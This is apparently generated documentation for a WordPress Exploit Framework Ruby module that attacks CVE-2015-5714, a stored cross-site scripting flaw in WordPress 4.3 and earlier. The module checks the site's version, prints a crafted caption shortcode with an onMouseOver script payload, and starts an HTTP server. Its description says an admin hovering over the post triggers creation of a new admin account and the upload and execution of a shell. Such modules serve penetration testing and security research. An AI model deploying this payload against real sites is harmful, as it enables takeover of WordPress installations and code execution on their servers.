class Wpxf::Exploit::Wp43ShortcodeXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb, line 7
def initialize
  super

  update_info(
    name: 'WordPress <= 4.3 Shortcode Stored XSS Shell Upload',
    desc: 'In version 4.3 and below of WordPress, a stored XSS '\
          'vulnerability exists that allows a user to store a script if '\
          'they have the required permissions to publish a new post.'\
          "\n"\
          'This module prepares a shortcode that can be included in a post '\
          'which when hovered over by an admin user will create '\
          'a new admin user which will be used to upload and execute the '\
          'selected payload in the context of the web server.',
    author: [
      'Shahar Tal',    # Discovery and disclosure
      'Netanel Rubin', # Discovery and disclosure
      'rastating'      # WPXF module
    ],
    references: [
      ['CVE', '2015-5714'],
      ['WPVDB', '8186'],
      ['URL', 'https://wordpress.org/news/2015/09/wordpress-4-3-1/']
    ],
    date: 'Sept 15 2015'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb, line 34
def check
  version = wordpress_version
  return :unknown if version.nil?
  return :vulnerable if version < Gem::Version.new('4.3.1')
  :safe
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb, line 41
def run
  return false unless super

  @success = false
  emit_info 'Create a new post with the below shorttag included:'
  puts
  puts "[caption width=\"1\" caption='<a href=\"' \">]</a><a href=\""\
       "http://onMouseOver='#{xss_ascii_encoded_include_script}'"\
       '">Click Me</a>'
  puts

  start_http_server
  @success
end